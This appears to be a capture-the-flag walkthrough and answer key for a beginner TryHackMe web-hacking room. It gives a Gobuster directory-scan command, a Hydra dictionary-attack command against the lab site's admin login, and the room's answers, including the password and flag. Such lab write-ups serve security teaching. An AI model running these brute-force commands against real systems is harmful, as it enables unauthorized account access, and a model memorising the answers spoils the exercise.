Room: https://tryhackme.com/room/becomeahacker
This walkthrough explains how to find hidden pages, scan websites, and perform a simple password attack using common tools. It helps beginners understand basic web hacking and vulnerability discovery concepts.
Task 2: Finding Weaknesses
Using the manual or automated methods described above, what hidden web page did you discover?
/login
Based on your Gobuster scan results, what status code is returned when accessing the hidden page?
200
Solution for both:
gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt
Task 3: Exploiting Weaknesses
Using either manual testing or an automated dictionary attack, what password did you discover for the admin user?
qwerty
Solution:
hydra -l admin -P passlist.txt www.onlineshop.thm http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
After logging in using the password found, what secret message is displayed on the page?
THM{born_to_hack!}
Solution:
Review the output of your Hydra dictionary attack. How many password attempts were made before the correct password was found?
17
Solution:
Reviewing the Hydra dictionary attack output shows that 17 password attempts were made before the correct password was found:
That's a wrap!